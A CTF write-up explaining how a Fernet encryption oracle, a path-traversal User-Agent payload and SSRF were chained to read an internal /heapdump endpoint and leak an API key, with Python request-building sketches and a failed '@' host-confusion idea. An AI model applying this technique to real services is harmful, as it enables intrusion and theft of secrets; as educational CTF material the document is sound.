BugPoC x NahamSec CTF write-up: SSRF + internal heapdump
Analysis
After examining the HTTP traffic and `script.js`, the following important things became clear:
- There are three hosts:
  - `doggo.buggywebsite.com` -> hosts the web front-end components (including `script.js`).
  - `doggo-api.buggywebsite.com` -> API which has the `/fingerprint` and `/get-dogs` endpoints exposed.
  - `buggy-dog-pics.s3-us-west-2.amazonaws.com` -> S3 bucket which hosts the dog images.
- The application is hosted on AWS infrastructure, since all of the above endpoints return headers such as `x-amz-request-id`, `x-amz-id-2` and `Apigw-Requestid`.
- The `/get-dogs` endpoint does the following:
  - Decrypts the `x-param` header, which is a Fernet-encrypted string.
  - It then makes an internal request to “`<api-host>` + `/dogs` + `decrypted-value-of-x-param`”.
  - It returns the `path`, `statusCode` and `response` from the above server-side request.
    - This strongly hinted at an SSRF vulnerability if the user could forge a valid `x-param` string. Luckily, the `/fingerprint` endpoint allowed us to do exactly this.
  - The `path` value in the response makes this endpoint a useful decryption primitive.
- The `/fingerprint` endpoint returns the Fernet-encrypted value of `{"UA": <User-Agent-request-header-value>}`.
  - By passing arbitrary User-Agent values, we can generate valid strings which have been encrypted using the server's Fernet key and may therefore be useful for SSRF as mentioned above.
  - This endpoint is a useful encryption primitive.
- There are some API endpoints which are not accessible to external users:
  - `/dogs` gives the response: `Error, this endpoint is only internally accessible`.
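The two primitives can be sketched as a pair of request builders. This is only a rough sketch under assumptions the analysis does not confirm: that both endpoints are reached over HTTPS with a GET request, and that the helper names (`build_fingerprint_request`, `build_get_dogs_request`) are hypothetical. Nothing is sent; the code only shows which header carries the attacker-controlled data in each case.

```python
import urllib.request

# Host taken from the analysis; the https scheme and GET method are assumptions.
API = "https://doggo-api.buggywebsite.com"


def build_fingerprint_request(user_agent):
    """Encryption primitive: the server encrypts {"UA": <user_agent>}."""
    return urllib.request.Request(
        API + "/fingerprint", headers={"User-Agent": user_agent}, method="GET"
    )


def build_get_dogs_request(token):
    """Decryption primitive: the server decrypts x-param and echoes the path."""
    return urllib.request.Request(
        API + "/get-dogs", headers={"x-param": token}, method="GET"
    )


# Placeholder values; a real token would come from the /fingerprint response.
fp_req = build_fingerprint_request("anything-we-like")
gd_req = build_get_dogs_request("<token-from-fingerprint-response>")

# urllib stores header names capitalized, hence "User-agent" and "X-param".
print(fp_req.full_url, fp_req.get_header("User-agent"))
print(gd_req.full_url, gd_req.get_header("X-param"))
```

Chaining the two (feed the `/fingerprint` output into `x-param`) is what turns a chosen User-Agent into a chosen suffix of the server-side request path.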
Solution steps
- In order for the SSRF to work, we need to know whether we can actually control the path. Since the path by default begins with `/dogs`, and encrypted data from `/fingerprint` will also contain JSON characters like `{\"UA\":\"`, we need path traversal to gain full control over the request path.
- To test this, send a request to `/fingerprint` with `User-Agent` set to `%2e%2e%2f%2e%2e%2fdogs?page=1#`, where `%2e` and `%2f` are the URL-encoded values of `.` and `/`. The `#` at the end turns the trailing characters, like `}`, into an irrelevant URL fragment. Use the encrypted fingerprint from the response as the value of the `x-param` header in a request to `/get-dogs`.
- This results in a valid server-side request to `/dogs?page=1`.
  - The `/dogs?page=x` endpoint just returns an array of strings of the form `https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog{number}.jpg`, with `number` running from `5x-4` to `5x`.
- We may now change the path and parameters to point to other internal endpoints.
- After trying and brute-forcing multiple endpoints, I still could not figure out what might work until I saw the hint posted on Twitter about heapdumps.
- A server-side request sent to `/heapdump` resulted in, as the name says, a heap dump of the Python data.
  - Trying the `/heapdump` endpoint from an external request gives the same response as that from `/dogs`: `Error, this endpoint is only internally accessible`.
  - This confirmed that it is an internal endpoint which could leak sensitive data through SSRF.
- The response from the SSRF request made to `/heapdump` included the `SECRET_API_KEY` as well and voila, I got the flag :) .
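To see why the traversal payload lands on the intended path, the server-side URL construction can be modelled locally. This is a simplified sketch, not the challenge's actual code: the host `api-host.invalid` is a placeholder, the JSON shape `{"UA":"..."}` is assumed from the characters mentioned above, and the stack is modelled as percent-decoding followed by dot-segment removal without claiming which real component performs each step. The `/heapdump` payload is written by analogy with the `/dogs?page=1` one.

```python
import posixpath
from urllib.parse import unquote, urlsplit

# Placeholder host: the real internal API host is not known from the write-up.
INTERNAL_HOST = "http://api-host.invalid"


def effective_target(user_agent):
    """Return the (path, query) reached for a given User-Agent value."""
    # Assumed shape of the decrypted fingerprint.
    decrypted = '{"UA":"' + user_agent + '"}'
    raw_url = INTERNAL_HOST + "/dogs" + decrypted
    # Model: percent-decode, split off query/fragment, collapse dot segments.
    parts = urlsplit(unquote(raw_url))
    return posixpath.normpath(parts.path), parts.query


print(effective_target("%2e%2e%2f%2e%2e%2fdogs?page=1#"))  # ('/dogs', 'page=1')
print(effective_target("%2e%2e%2f%2e%2e%2fheapdump#"))     # ('/heapdump', '')
```

In this model the first `..` simply becomes the tail of the junk segment `dogs{"UA":"..`, and the second `..` removes that whole segment, which is why two traversal steps are needed even though only one directory level is being escaped.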
BugPoC python script:
- BugPoC ID: bp-YdjHgElZ
- Password: bIgBoNObo83
Deadends
I tried a few other things which didn’t work:
- Breaking the Fernet encryption scheme:
  - Fernet encryption is pretty robust if used properly. It is not vulnerable to known or chosen-plaintext attacks which I could have used here with the primitives at hand.
  - Since I did not have the encryption key, this was a dead end.
- Attacking python requests library URL parsing:
  - I knew the Python requests library was being used in the back-end because, once I could control the path of the server-side request, sending an internal request to `/fingerprint` and decrypting the resulting string using `/get-dogs` showed that the User-Agent was `python-requests/2.22.0`.
  - Knowing this, I tried to gain control over the host for the SSRF as well, but this didn’t work. I tried fooling the URL parsing of the Python requests library. This would have been possible if the URL concatenation had been like `http://<intended-host><any-data-except-fwd-slash-i-guess>` + `@<attacker-controlled-host>`, in which case the library would send a request to `<attacker-controlled-host>` instead of `<intended-host>`. Unfortunately, since we could only add a controlled string after `/dogs` (which contains a forward slash), this didn’t work out either.
  - This may be a good CTF challenge idea for a future challenge ;) .
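The `@` idea and the reason it failed can be illustrated with the standard library's URL splitter. This is a small sketch that uses `urllib.parse` as a stand-in for the generic URL authority rule rather than the requests library itself, and the host names are hypothetical.

```python
from urllib.parse import urlsplit

# Hypothetical hosts, for illustration only.
INTENDED = "intended.example"
ATTACKER = "attacker.example"

# If attacker data landed directly after the host, "@" would turn the
# intended host into the userinfo part of the authority.
hoped_for = urlsplit("http://" + INTENDED + "@" + ATTACKER + "/")
print(hoped_for.hostname)  # attacker.example

# Here the controlled data comes after "/dogs", so the authority has already
# ended at the first "/" and "@" is just another path character.
actual = urlsplit("http://" + INTENDED + "/dogs" + "@" + ATTACKER + "/")
print(actual.hostname)  # intended.example
print(actual.path)      # /dogs@attacker.example/
```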
Summary
Overall I liked the task. It required reverse-engineering and understanding how the application back-end might be functioning through the web traffic alone. Getting stuck not knowing what to do after SSRF was frustrating but the hint really helped! Without it, it felt like a guessing task as I was brute-forcing common paths. However, judging from the heap dump itself, which contains `lambda_function` definitions, the `/heapdump` endpoint might be a common thing for a Python AWS Lambda application, which I should have known?